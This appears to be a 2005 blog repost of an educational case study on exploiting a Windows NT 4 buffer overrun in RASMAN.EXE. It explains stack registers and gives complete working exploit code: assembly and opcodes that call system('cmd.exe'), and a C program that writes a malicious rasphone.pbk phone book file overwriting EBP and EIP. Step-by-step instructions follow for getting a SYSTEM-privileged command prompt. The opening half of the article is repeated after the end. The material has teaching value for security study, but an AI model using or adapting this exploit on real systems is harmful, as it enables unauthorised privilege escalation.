Monday, July 25, 2005
NT Buffer Overrun
Technology Updates
Exploiting Windows NT 4 Buffer Overruns
A Case Study:
RASMAN.EXE
--------------------------------------------------------------------------------
Introduction
This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do. With these covered we'll look into the buffer overrun found in RASMAN.EXE. This document may be freely copied and distributed only in its entirety and if credit is given.
Cheers, David Litchfield
What is a buffer overrun?
A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing and overwritting possibly critical information crucial to the normal execution of the program. Consider the following source:
#include
int main ( )
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
When this source is compiled and turned into a program and the program is run it will assign a block of memory 32 bytes long to hold the name string. Under normal operation someone would type in their name, for instance "David", and the program would then print to the screen "Hello, David". David is 5 letters long, with each letter taking up a single byte. The end of a string, though, is denoted by a thing called a null terminator - which is basically a byte with a value of zero. So we need to add a null terminator to the end of the string making a total length of 6 bytes. It is clear that 6 bytes will fit into the 32 bytes set aside to store the name string. If however, instead of entering "David", we entered
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
that is 40 capital As, when the program reads in our input and places it in our buffer it overflows. 40 will definitely not fit into 32.
It so happens that if we enter 40 As we completely overwrite the contents of a special CPU register known as the Instruction Pointer or EIP - the E stands for Extended by the way. A quick explanation of a register - a computer's processor has small memory storage units called registers. Access to the values held in these registers is very quick. These registers have special names and can hold memory addresses and variables. The EIP is one of these registers and holds the memory address of the next instruction to execute. What do I mean by instruction? A program contains a list of instructions for the processor to carry out in order for the program to do its job, much like a recipe contains instructions for a cook to carry out in order to make a cake. These instructions are known as operation codes or opcodes for short. So when a program is running and the processor is executing one of the program's instructions the EIP holds the memory address where the next instruction to be executed can be found. After the current instruction has been executed the processor goes to that memory address and pulls in the instruction found there and then increments the EIP and the executes that instruction. This process of pulling the opcode from the memory address pointed to by the EIP, then incrementing the EIP then executing that instruction continues until the program exits.
Going back to our code, the fact that we have overwritten the EIP means that we can effectively tell the CPU to go to a memory address of our choosing and pull down the instruction found there and execute that. Because we are filling the buffer with As we overwrite the EIP with 0x41414141 - 41 is the hex value for a capital A. The processor then goes to address 0x41414141 and tries to read in the instruction found at that address. If there's no instruction there we get a thing known as an Access Violation. Most people will know of this as a message popping up saying something like "The Instruction at '0x41414141' referenced memory at '0x41414141'. The memory could not be read." If we had filled our buffer with Bs we would overwrite the EIP with 0x42424242 essentially telling the processor to go that that memory address to get the next instruction and more than likely we'd get the same Access Violation.
Exploiting a buffer overrun.
As you'll see later on, being able to overwrite the EIP is vital to exploiting a buffer overrun. When you exploit a buffer overrun you basically get the processor to execute instructions or code of your choosing getting the program to do something it would not normally do. You do this by pointing the EIP back into the buffer which you load with your own opcodes which are then executed. This begs the question , "Why would someone want to do this?"
Windows NT, like UNIX systems, require a user to log into the system. Some users are very powerful, such as the Administrator and others are just your average normal user that aren't as powerful. If a normal user wanted to become equivalent to the Administrator and thus just as powerful with almost full control of the system they could exploit a buffer overrun to attain this. The problem is the buffer overrun needs to be in a process that has enough power and privileges to be able to make them an Administrator so there is no point in buffer overruning a process that they, the user themselves, have started. They need to buffer overrun a process started by the system and then get the process to execute their own arbitary code. The system account is very powerful, and if you can get a system process to do something, such as open a Command Prompt, then it will run with system privileges. In Windows NT, if a process starts a new child process then the child process normally inherits the access token of the parent process, normally because some processes can be started using the Win32 CreateProcessAsUser ( ) function that will start the new process under the security context of another user and thus the new process will have a different access token than the parent process. An Access Token is like a set of keys - they denote a user's rights and privileges that determine what they can and cannot do to the machine. An example of this is screen savers. The winlogon.exe system process is responsible for starting a user's screen saver. As oppossed to runing the screen saver in the security context of the system winlogon uses CreateProcessAsUser ( ) to start the screen saver in the security context of the currently logged on user. I digress - back to buffer overruns. In this case study we'll look at the buffer overrun in RASMAN.EXE, a system process, and get it to open a Windows NT Command Prompt. This Command Prompt will have the access token of the system account and so will any other processes started from it. But first a bit more on an NT process' virtual memory layout.
A process embodies many things such as, amongst others, a running program, one or more threads of execution, the process' virtual address space and the dynamic link libraries (DLLs) the program uses. The process has 4 GB of virtual address space to use. Half of this is, from address 0x00000000 to 0x7FFFFFFF, private address space where the program, its DLLs and stack (or stacks in the case of a multihthreaded program) are found and the other half, address 0x80000000 to 0xFFFFFFFF is the system address space where such things as NTOSKRNL.EXE and the HAL are loaded. As a side note, this default behaviour can be changed as of service pack three - you can specify a switch in the boot.ini - /3GB - that will assign 3 GB as private address space and 1 GB as system address space. This is to boost the performance of programs, such as databases, the require large amounts of memory.
When a program is run NT creates a new process. It loads the program's instructions and the DLLs the program uses into the private address space and marks the pages it uses as read-only. Any attempt to modify pages in memory marked as read only will cause an Access Violation. The first thread is started and a stack is initialised.
The Stack
What's the simplest way to describe a stack? Try this: Imagine a carpenter. He has tools, materials and instructions. To be able to make something though they need a workbench. The stack is similar to this workbench. It is a place where he can use his tools to shape and model his raw materials. He can put something down on the workbench, say waiting for the glue to dry on two bits of wood and do something else. When that task is complete he can come back to his two bits of wood and continue with that. The workbench is where most of the work is done.
So too, in a process, the stack is where most things are done. It is a writeable area of memory that dynamically shrinks and grows as is needed or determined by the program's execution. When a programatic task is started it'll place data on the stack, whether these be strings, memory addresses, integers or whatever, then manipulate them and when the task has completed it will return the stack to its original state so that the next task can use it if it needs to. Working in this way the process interacts with the stack using a method known as Last In, First Out or LIFO.
There are two registers that are crucial to the stack's functionality - they are used by the program to keep track of where data can be found in memory. These two registers are the ESP and the EBP.
The ESP, or the Stack Pointer points to the top of the stack. The ESP contains the memory address where the top of the stack can be found. The ESP can be changed in a number of ways both indirectly and directly.When something is PUSHed onto the stack the ESP increases accordingly. When something is POPed off of the stack the ESP shrinks. The PUSH and POP operations modify the ESP indirectly. But then you can manipulate the ESP directly, with say an instruction of "SUB esp,04h" which pushes the stack out by four bytes or one word. For those that haven't yet been numbed into boardem, something may just have irked: how is it that you SUBtract 4 from the ESP and yet the ESP is pushed out? Well this is because the stack works backwards. The bottom of the stack uses a memory address higher than the top of the stack:
----------------0x12121212 Top of the stack
...
...
----------------0x121212FF Bottom of the stack
Here we have definitive proof that the fathers of modern computing were indeed closet sadists or had shares in makers of paracetamol - occasionally they throw in gems like this to make that headache that bit more acute. When we say the stack increases in size the address held in the ESP decreases. Conversly when the stack size decreases the address held in the ESP increases. Reaching for the Asprin yet?
Our second stack related register is known as the EBP or the Base Pointer. The EBP holds then memory address of the bottom of the stack - more accurately it points to a base point in the stack that we can use a reference point within a given programatic task. The EBP must have meaning to a given task and to facilitate this before the task's real business is started a setup procedure known as the "procedure prologue" is first completed. What this does is, firstly, save the current EBP by PUSHing it onto the stack. This is so that the processor and program will know where to pick up from after the currently executing task has completed. The ESP is then copied into the EBP thus creating a new Base Pointer that the currently executing task can use as a reference point irrespective of how the ESP changes during the task's execution. Continuing with this let's say an 11 character string was placed onto the stack - our EBP remains the same but the ESP has been pushed out by 12 bytes. Then say an address was PUSHed onto the stack - our ESP is pushed out by another 4 bytes, though our EBP still remains the same. Now let's say we needed to reference the 11 byte string - we can do this by using our EBP: we know the first byte of our string (the pointer to the string) is twelve bytes away from the EBP so we can reference this string's pointer by saying,"the address found at EBP minus 12". (Remember the stack goes from a higher address to a lower address)
RASMAN and buffer overruns.
Finding the buffer overrun
The first thing you need to do to be able to exploit a buffer overrun is to a) know about an existing one or b) find your own one. In the case of RASMAN, the overrun was found by looking at the RAS functions and the structures the used. Notice that some of the functions, such as RasGetDialParams ( ), fill structures that contain characters arrays, much like char name[31] character array in the C code above. By playing around with rasphone.pbk file, the RAS Phone Book, where dialing details, such as the phone number to be dialed, are stored, you can root out these overruns. Make a phone book entry called "Internet", which dials into your ISP, dial it, and downloaded your mails. This is important as this adds to the Registry an entry for the domain name of your mail server as an Autodial location. That is, if you try to contact your mail server, from that point on, without being dialed into the Internet, the Connection manager would kick in and automatically dial for you. RASMAN is the process that handles this functionality. Once you have done this change the telephone number to a long string of As and then attempted to connect to your mail server, say, by opening Outlook Express. This causes RASMAN to read in from rasphone.pbk the telephone number to dial to be able to get to your mail server. But instead of the real telephone number the long string of As is read instead and fills a character array in the RAS_DIAL_PARAMS structure which overflows causing an Access Violation - at address 0x41414141. We've found a buffer overrun and, more exciting, overwritten the EIP.
Finding where the EIP is overwritten
By experimenting with the length of the "telephone number" we find that we overwrite the EIP with bytes 296,297,298 and 299 of our string. (You'll find that, if you are actually following this, you'll need to reboot the system after the overflow to be able to restart the service, and you'll have to end tasks such as AthenaWindow and msmin.exe.) Once we have found where we overwrite the EIP it is time to get out the debugger - the debugging capabilities of Visual C++ are very good. Attach to the RASMAN process and then get it to dial - or attempt to at least. Wait for the access violation.
Analyze what's going on.
Once the access violation has occured we need to look at the stack and the state of the CPU's registers. From this we can see that we also overwrite the EBP, which will come in handy later on and that the address of the first A of our "telephone number" is 0x015DF105. By getting RASMAN to access violate a number of times we find that the first A is always written to this address. This is the address we're going to set the EIP to so that the processor will look at that address for the next instrution to execute. We'll stuff the "telephone number" full of our own opcodes that will get RASMAN to do what we want it to do - our arbitary code. We then need to ask, "What do we want it to do?".
Where do you want to go today? - What do you want to acheive?
The best thing to do, as we need to be at the console to get this to work, is get RASMAN to open up a Command Prompt. From here we can run any program we want with system privileges. The easiest way to get a program to run a Command Prompt, or any other program for that matter is to use the system ( ) function. When the system ( ) function is called it looks at the value of the ComSpec environment variable, normally "c:\winnt\system32\cmd.exe" on Windows NT and executes that with a "/C" switch. The function passes cmd.exe a command to run and the "/C" switch tells cmd.exe to exit after the command has finished executing. If we pass "cmd.exe" as the command - system("cmd.exe"); - this will cause the system function to open up cmd.exe with the "/C" switch and execute cmd.exe - so we are running two instances of the command interpreter - however the second one won't exit until we tell it to ( and nor will the first until the second one has exited.)
Rather than the placing the opcodes that actually form the system ( ) function in our exploit string it would be easier to simply call it. When you call a function you tell the program to go to a certain DLL that contains the code for the function you are calling. The use of DLLs means that programs can be smaller in size - rather than each program containing the necessary code for each function used they can call a shared DLL that does contain the code. DLLs are said to export functions - that is the DLL provides an address where a function can be found. The DLL also has a base address so the system knows where to find that DLL. When a DLL is loaded into a process' address space it will always be found at that base address and the functions it exports can then be found at an entry point within the base. The system ( ) function is exported msvcrt.dll (the Microsoft Visual C++ Runtime library) which has base address of 0x78000000 and system ( ) entry point can be found at 000208C3 (in version 5.00.7303 of msvcrt.dll anyway) meaning that the address of the system ( ) function is 0x780208C3. Hopefully msvcrt.dll will already be loaded into RASMAN's address space - if it isn't we'll need to use LoadLibrary ( ) and GetProcAddress ( ). Fortunately RASMAN does use msvcrt.dll and so it is already in the process address space. This makes the job of exploiting the buffer overrun very easy indeed - we'll simply build a stack with our string of the command to run (cmd.exe) and and call it. What makes it even better is that the address 0x780208C3 has no nulls (00) in it. Nulls can really complicate issues.
To find out what the stack needs to look like when a normal program calls system("cmd.exe"); we need to write one that does and debug it. We'll need to get our arbitary code to build a duplicate image of the stack as it appears in our program just before system ( ) is called. Below is the source of our program. Compile and link it with kernel32.lib then run and debug it.
#include
#include
typedef void (*MYPROC)(LPTSTR);
int main()
{
HINSTANCE LibHandle;
MYPROC ProcAdd;
char dllbuf[11] = "msvcrt.dll";
char sysbuf[7] = "system";
char cmdbuf[8] = "cmd.exe";
LibHandle = LoadLibrary(dllbuf);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
(ProcAdd) (cmdbuf);
return 0;
}
On debugging and examining the stack prior to calling system ( ) [(ProcAdd)(cmdbuf); in the above code] we see that starting from the top of the stack we find the address of the "c" of cmd.exe, then the address of where the system ( ) function can be found, the null terminated cmd.exe string and a few other things that are too important. So to emulate this we need the null terminated "cmd.exe"string in the stack, then the address of the system function and then the address which points to our "cmd.exe" string. Below is a picture of what we need the stack to look like before calling system ( )
-------------------- ESP (Top of the Stack)
XX
--------------------
XX
--------------------
XX
--------------------
XX
--------------------
C3
--------------------
08
--------------------
02
--------------------
78
--------------------
63 c
--------------------
6D m
--------------------
64 d
--------------------
2E .
--------------------
65 e
--------------------
78 x
--------------------
65 e
--------------------
00
-------------------- EBP (Bottom of the stack)
where the top 4 XXs are the address of "c". We don't need to hardcode this address into our exploit string because we can use the EBP as a reference - remember it is the base pointer. Later on you'll see that we load the address where the first byte of our cmd.exe string can be found into a register using the EBP as a reference point.
Writing the Assembly.
This is what we need the stack to look like when we call system ( ). How do we get it there? We have to build it ourselves with our opcodes - we can't just put it in our exploit string because as you can see there are nulls in it and we can't have nulls. Because we have to build it this is where knowing at least a little assembly language comes in handy. The first thing we need to do is set the ESP to an address we can use for our stack. (Remember the ESP points to the top of the stack.) To do this we use:
mov esp, ebp
This moves the EBP into the ESP - rember we overwrite the EBP as well as the EIP which is really handy. We'll overwrite the EBP with an address we know we can write to - we will use 0x015DF124. Consequently the ESP, after we move the EBP into it, the top of the stack will be found at 0x015DF124.
We then want to push EBP onto the stack. This is our return address.
push ebp
This has the effect of pushing the ESP down 4 bytes and so ESP is now 0x015DF120. After this we then want to move the ESP into the EBP:
mov ebp,esp
This completes our own procedure prologue. With this done we can go about building the stack the way we want it to look
The next thing we need to do is get some nulls onto the stack. We need some nulls because we need to have our cmd.exe string terminated with a null. Even though the cmd.exe string isn't there yet it will be but we have to do things in reverse order. Before we can push some nulls onto the stack we need to make some. We do this by xoring a register with itself- we'll use the EDI register.
xor edi,edi
This will set the EDI to 00000000 and then we push it onto the stack using
push edi
This also has the added effect of pushing out our ESP to 0x015DF11C. But "cmd.exe" is 7 bytes long and we only have room for 4 bytes so far and don't forget we need a null tacked on the end of our string so we need to push the ESP out another 4 bytes to give us a total of 8 bytes of space between the ESP and the EBP. We could push the edi again, but for varitey we'll just sub the ESP by 4.
sub esp,04h
Our ESP is now 0x015DF118 and our EBP is 0x015DF120. Our next job is to get cmd.exe written to the stack. To do this we'll use the EBP as a reference point and move 63, the hex value for a small "c" into the address offset from the EBP minus 8.
mov byte ptr [ebp-08h],63h
We do the same for the "m", the "d", the ".", the first"e", the "x" and the final "e".
mov byte ptr [ebp-07h],6Dh mov byte ptr [ebp-06h],64h mov byte ptr [ebp-05h],2Eh mov byte ptr [ebp-04h],65h mov byte ptr [ebp-03h],78h mov byte ptr [ebp-02h],65h
Our stack now looks like this:
----------------------------------------------------- ESP
63 c
-----------------------------------------------------
6D m
-----------------------------------------------------
64 d
-----------------------------------------------------
2E .
-----------------------------------------------------
65 e
-----------------------------------------------------
78 x
-----------------------------------------------------
65 e
-----------------------------------------------------
00
----------------------------------------------------- EBP
All that we need to do now is put the address of system( ) onto the stack and the pointer to our cmd.exe string on top of that - once that is done we'll call the system ( ) function.
We know that the system( ) function is exported at address 0x780208C3 so we'll move this into a register and then push it onto the stack:
mov eax, 0x780208C3 push eax
We then want to put the address of the "c" of our "cmd.exe" string onto the stack. We know that the "c" can be found eight bytes away from our EBP so we'll load the address 8 bytes less than the EBP into a register:
lea eax,[ebp-08h]
The EAX register now holds the address where our cmd.exe string begins. We then want to push this onto the stack:
push eax
With this done our stack is built and we are ready to call system ( ) but we don't call it directly - again we use the indirection of using our EBP as a reference point and call address found at EBP minus 12 (or 0C in hex):
call dword ptr [ebp-0ch]
Here is all our code strung together.
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
The next thing to do is test this assembly to see if it works so we need to write a program that uses the __asm ( ) function. The __asm ( ) function takes Assembly language and incorporates it into a C program. As we are calling system ( ) which is exported by msvcrt.dll we'll need to load that- we use the LoadLibrary ( ) function to do this - otherwise when run our code would fail:
#include
#include
void main()
{
LoadLibrary("msvcrt.dll");
__asm {
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
}
}
compile and link with kernel32.lib. When run this should start a new instance of the Command Interperter, cmd.exe. There will be an access violation however when you exit that instance in the program though - we've messed around with the stack and haven't clean up after ourselves.
That's it then - that's our arbritary code and all we need to do now is put this into the rasphone.pbk file as our telephone number. Before we can do that though, we need to get the op-codes for the above assembly.
This is relatively easy - just debug the program you've just compiled and get the opcodes from there. You should get "8B E5" for "mov esp,ebp" and "55" for "push ebp" etc etc. Once we have all the opcodes we need to put these in our "telephone number". But we can't type the opcodes very easily in Notepad. The easiest thing to do is write another program that creates a rasphone.pbk file with the telephone number loaded with our arbitary code. Below is an example of such a program with comments:
/* This program produces a rasphone.pbk file that will cause and exploit a buffer overrun in */
/* RASMAN.EXE - it will drop the user into a Command Prompt started by the system. */
/* It operates by re-writing the EIP and pointing it back into our exploit string which calls */
/* the system() function exported at address 0x780208C3 by msvcrt.dll (ver 5.00.7303) on */
/* NT Server 4 (SP3 & 4). Look at the version of msvcrt.dll and change buffer[109] to buffer[112]*/
/* in this code to suit your version. msvcrt.dll is already loaded in memory - it is used by */
/* RASMAN.exe. Developed by David Litchfield (mnemonix@globalnet.co.uk ) */
#include
#include
int main (int argc, char *argv[])
{
FILE *fd;
int count=0;
char buffer[1024];
/* Make room for our stack so we are not overwriting anything we haven't */
/* already overwritten. Fill this space with nops */
while (count < 37)
{
buffer[count]=0x90;
count ++;
}
/* Our code starts at buffer[37] - we point our EIP to here @ address 0x015DF126 */
/* We build our own little stack here */
/* mov esp,ebp */
buffer[37]=0x8B;
buffer[38]=0xE5;
/*push ebp*/
buffer[39]=0x55;
/* mov ebp,esp */
buffer[40]=0x8B;
buffer[41]=0xEC;
/* This completes our negotiation */
/* We need some nulls */
/* xor edi,edi */
buffer[42]=0x33;
buffer[43]=0xFF;
/* Now we begin placing stuff on our stack */
/* Ignore this NOP */
buffer[44]=0x90;
/*push edi */
buffer[45]=0x57;
/* sub esp,4 */
buffer[46]=0x83;
buffer[47]=0xEC;
buffer[48]=0x04;
/* When the system() function is called you ask it to start a program or command */
/* eg system("dir c:\\"); would give you a directory listing of the c drive */
/* The system () function spawns whatever is defined as the COMSPEC environment */
/* variable - usually "c:\winnt\system32\cmd.exe" in NT with a "/c" parameter - in */
/* other words after running the command the cmd.exe process will exit. However, running */
/* system ("cmd.exe") will cause the cmd.exe launched by the system function to spawn */
/* another command prompt - one which won't go away on us. This is what we're going to do here*/
/* write c of cmd.exe to (EBP - 8) which happens to be the ESP */
/* mov byte ptr [ebp-08h],63h */
buffer[49]=0xC6;
buffer[50]=0x45;
buffer[51]=0xF8;
buffer[52]=0x63;
/* write the m to (EBP-7)*/
/* mov byte ptr [ebp-07h],6Dh */
buffer[53]=0xC6;
buffer[54]=0x45;
buffer[55]=0xF9;
buffer[56]=0x6D;
/* write the d to (EBP-6)*/
/* mov byte ptr [ebp-06h],64h */
buffer[57]=0xC6;
buffer[58]=0x45;
buffer[59]=0xFA;
buffer[60]=0x64;
/* write the . to (EBP-5)*/
/* mov byte ptr [ebp-05h],2Eh */
buffer[61]=0xC6;
buffer[62]=0x45;
buffer[63]=0xFB;
buffer[64]=0x2E;
/* write the first e to (EBP-4)*/
/* mov byte ptr [ebp-04h],65h */
buffer[65]=0xC6;
buffer[66]=0x45;
buffer[67]=0xFC;
buffer[68]=0x65;
/* write the x to (EBP-3)*/
/* mov byte ptr [ebp-03h],78h */
buffer[69]=0xC6;
buffer[70]=0x45;
buffer[71]=0xFD;
buffer[72]=0x78;
/*write the second e to (EBP-2)*/
/* mov byte ptr [ebp-02h],65h */
buffer[73]=0xC6;
buffer[74]=0x45;
buffer[75]=0xFE;
buffer[76]=0x65;
/* If the version of msvcrt.dll is 5.00.7303 system is exported at 0x780208C3 */
/* Use QuickView to get the entry point for system() if you have a different */
/* version of msvcrt.dll and change these bytes accordingly */
/* mov eax, 0x780208C3 */
buffer[77]=0xB8;
buffer[78]=0xC3;
buffer[79]=0x08;
buffer[80]=0x02;
buffer[81]=0x78;
/* Push this onto the stack */
/* push eax */
buffer[82]=0x50;
/* now we load the address of our pointer to the cmd.exe string into EAX */
/* lea eax,[ebp-08h]*/
buffer[83]=0x8D;
buffer[84]=0x45;
buffer[85]=0xF8;
/* and then push it onto the stack */
/*push eax*/
buffer[86]=0x50;
/* now we call our system () function - all going well a command prompt will */
/* be started, the parent process being rasman.exe */
/*call dword ptr [ebp-0Ch] */
buffer[87]=0xFF;
buffer[88]=0x55;
buffer[89]=0xF4;
/* fill to our EBP with nops */
count = 90;
while (count < 291)
{
buffer[count]=0x90;
count ++;
}
/* Re-write EBP */
buffer[291]=0x24;
buffer[292]=0xF1;
buffer[293]=0x5D;
buffer[294]=0x01;
/* Re-write EIP */
buffer[295]=0x26;
buffer[296]=0xF1;
buffer[297]=0x5D;
buffer[298]=0x01;
buffer[299]=0x00;
buffer[300]=0x00;
/* Print on the screen our exploit string */
printf("%s", buffer);
/* Open and create a file called rasphone.pbk */
fd = fopen("rasphone.pbk", "w");
if(fd == NULL)
{
printf("Operation failed\n");
return 0;
}
else
{
fprintf(fd,"[Internet]\n");
fprintf(fd,"Phone Number=");
fprintf(fd,"%s",buffer);
fprintf(fd,"\n");
}
return 0;
}
When compiled and run this program will create a rasphone.pbk file with one entry called Internet and a phone number loaded with our arbitary code. When RASMAN.EXE opens this file and it uses RasGetDialParams ( ) to get the relevant information and assigns it to a RAS_DIAL_PARAMS structure which contains the character arrays. As you'll have guessed we're overflowing the one that holds the telephone number.
Now to test it all.
Quite often when trying to exploit buffer overruns you don't get it right the first time - usually due to an oversight or something. The code in this document has been tested on NT Server 4 with SP 3, NT Server 4 with SP 4 and NT Workstation SP 3 all running on a Pentium processor and it works - that's not to say that it will run on your machine though. There could be a number of reasons why it might not, but that is up to you to find out. So any way, let's test it:
To be able to get this to work take the following steps:
1) Make a backup copy of your real rasphone.pbk file and then delete the original. The NTFS permissions on this file by default give everybody the Change permission so there shouldn't be a problem with this.
2) Run rasphone (click on Start -> Run -> type rasphone -> OK). You should get a message saying that the phone book is empty and click OK to create a new one.
3) Click OK and make a new entry calling it "Internet". Put in the relevant information needed to be able to dial into your ISP. Once the entry is complete dial it.
4) Once connected open Outlook Express and download your e-mails. The reason for doing this is because this will create a Registry entry for your mail server's domain name and associate it as an autodialable address. If Outlook Express' connection is dial up change it to a LAN connection - this'll be under the mail account's properties.
5) Hangup and close Outlook Express.
6) Copy the delete the new rasphone.pbk and replace it with your one made from the above code.
7) Open Outlook Express.
Because your not connected to the Internet RASMAN should automatically dial for you, read in from the Registry the autodail information then open rasphone.pbk, fill its buffers and overflow. Within about eight seconds or so a Command Prompt window will open. This Command Prompt has SYSTEM privileges.
That's it - we've exploited a buffer overrun and executed our arbitary code.
Acticle from : http://www.ngssoftware.com/papers/ntbufferoverflow.html
Exploiting Windows NT 4 Buffer Overruns
A Case Study:
RASMAN.EXE
--------------------------------------------------------------------------------
Introduction
This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do. With these covered we'll look into the buffer overrun found in RASMAN.EXE. This document may be freely copied and distributed only in its entirety and if credit is given.
Cheers, David Litchfield
What is a buffer overrun?
A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing and overwritting possibly critical information crucial to the normal execution of the program. Consider the following source:
#include
int main ( )
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
When this source is compiled and turned into a program and the program is run it will assign a block of memory 32 bytes long to hold the name string. Under normal operation someone would type in their name, for instance "David", and the program would then print to the screen "Hello, David". David is 5 letters long, with each letter taking up a single byte. The end of a string, though, is denoted by a thing called a null terminator - which is basically a byte with a value of zero. So we need to add a null terminator to the end of the string making a total length of 6 bytes. It is clear that 6 bytes will fit into the 32 bytes set aside to store the name string. If however, instead of entering "David", we entered
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
that is 40 capital As, when the program reads in our input and places it in our buffer it overflows. 40 will definitely not fit into 32.
It so happens that if we enter 40 As we completely overwrite the contents of a special CPU register known as the Instruction Pointer or EIP - the E stands for Extended by the way. A quick explanation of a register - a computer's processor has small memory storage units called registers. Access to the values held in these registers is very quick. These registers have special names and can hold memory addresses and variables. The EIP is one of these registers and holds the memory address of the next instruction to execute. What do I mean by instruction? A program contains a list of instructions for the processor to carry out in order for the program to do its job, much like a recipe contains instructions for a cook to carry out in order to make a cake. These instructions are known as operation codes or opcodes for short. So when a program is running and the processor is executing one of the program's instructions the EIP holds the memory address where the next instruction to be executed can be found. After the current instruction has been executed the processor goes to that memory address and pulls in the instruction found there and then increments the EIP and the executes that instruction. This process of pulling the opcode from the memory address pointed to by the EIP, then incrementing the EIP then executing that instruction continues until the program exits.
Going back to our code, the fact that we have overwritten the EIP means that we can effectively tell the CPU to go to a memory address of our choosing and pull down the instruction found there and execute that. Because we are filling the buffer with As we overwrite the EIP with 0x41414141 - 41 is the hex value for a capital A. The processor then goes to address 0x41414141 and tries to read in the instruction found at that address. If there's no instruction there we get a thing known as an Access Violation. Most people will know of this as a message popping up saying something like "The Instruction at '0x41414141' referenced memory at '0x41414141'. The memory could not be read." If we had filled our buffer with Bs we would overwrite the EIP with 0x42424242 essentially telling the processor to go that that memory address to get the next instruction and more than likely we'd get the same Access Violation.
Exploiting a buffer overrun.
As you'll see later on, being able to overwrite the EIP is vital to exploiting a buffer overrun. When you exploit a buffer overrun you basically get the processor to execute instructions or code of your choosing getting the program to do something it would not normally do. You do this by pointing the EIP back into the buffer which you load with your own opcodes which are then executed. This begs the question , "Why would someone want to do this?"
Windows NT, like UNIX systems, require a user to log into the system. Some users are very powerful, such as the Administrator and others are just your average normal user that aren't as powerful. If a normal user wanted to become equivalent to the Administrator and thus just as powerful with almost full control of the system they could exploit a buffer overrun to attain this. The problem is the buffer overrun needs to be in a process that has enough power and privileges to be able to make them an Administrator so there is no point in buffer overruning a process that they, the user themselves, have started. They need to buffer overrun a process started by the system and then get the process to execute their own arbitary code. The system account is very powerful, and if you can get a system process to do something, such as open a Command Prompt, then it will run with system privileges. In Windows NT, if a process starts a new child process then the child process normally inherits the access token of the parent process, normally because some processes can be started using the Win32 CreateProcessAsUser ( ) function that will start the new process under the security context of another user and thus the new process will have a different access token than the parent process. An Access Token is like a set of keys - they denote a user's rights and privileges that determine what they can and cannot do to the machine. An example of this is screen savers. The winlogon.exe system process is responsible for starting a user's screen saver. As oppossed to runing the screen saver in the security context of the system winlogon uses CreateProcessAsUser ( ) to start the screen saver in the security context of the currently logged on user. I digress - back to buffer overruns. In this case study we'll look at the buffer overrun in RASMAN.EXE, a system process, and get it to open a Windows NT Command Prompt. This Command Prompt will have the access token of the system account and so will any other processes started from it. But first a bit more on an NT process' virtual memory layout.
A process embodies many things such as, amongst others, a running program, one or more threads of execution, the process' virtual address space and the dynamic link libraries (DLLs) the program uses. The process has 4 GB of virtual address space to use. Half of this is, from address 0x00000000 to 0x7FFFFFFF, private address space where the program, its DLLs and stack (or stacks in the case of a multihthreaded program) are found and the other half, address 0x80000000 to 0xFFFFFFFF is the system address space where such things as NTOSKRNL.EXE and the HAL are loaded. As a side note, this default behaviour can be changed as of service pack three - you can specify a switch in the boot.ini - /3GB - that will assign 3 GB as private address space and 1 GB as system address space. This is to boost the performance of programs, such as databases, the require large amounts of memory.
When a program is run NT creates a new process. It loads the program's instructions and the DLLs the program uses into the private address space and marks the pages it uses as read-only. Any attempt to modify pages in memory marked as read only will cause an Access Violation. The first thread is started and a stack is initialised.
The Stack
What's the simplest way to describe a stack? Try this: Imagine a carpenter. He has tools, materials and instructions. To be able to make something though they need a workbench. The stack is similar to this workbench. It is a place where he can use his tools to shape and model his raw materials. He can put something down on the workbench, say waiting for the glue to dry on two bits of wood and do something else. When that task is complete he can come back to his two bits of wood and continue with that. The workbench is where most of the work is done.
So too, in a process, the stack is where most things are done. It is a writeable area of memory that dynamically shrinks and grows as is needed or determined by the program's execution. When a programatic task is started it'll place data on the stack, whether these be strings, memory addresses, integers or whatever, then manipulate them and when the task has completed it will return the stack to its original state so that the next task can use it if it needs to. Working in this way the process interacts with the stack using a method known as Last In, First Out or LIFO.
There are two registers that are crucial to the stack's functionality - they are used by the program to keep track of where data can be found in memory. These two registers are the ESP and the EBP.
The ESP, or the Stack Pointer points to the top of the stack. The ESP contains the memory address where the top of the stack can be found. The ESP can be changed in a number of ways both indirectly and directly.When something is PUSHed onto the stack the ESP increases accordingly. When something is POPed off of the stack the ESP shrinks. The PUSH and POP operations modify the ESP indirectly. But then you can manipulate the ESP directly, with say an instruction of "SUB esp,04h" which pushes the stack out by four bytes or one word. For those that haven't yet been numbed into boardem, something may just have irked: how is it that you SUBtract 4 from the ESP and yet the ESP is pushed out? Well this is because the stack works backwards. The bottom of the stack uses a memory address higher than the top of the stack:
----------------0x12121212 Top of the stack
...
...
----------------0x121212FF Bottom of the stack
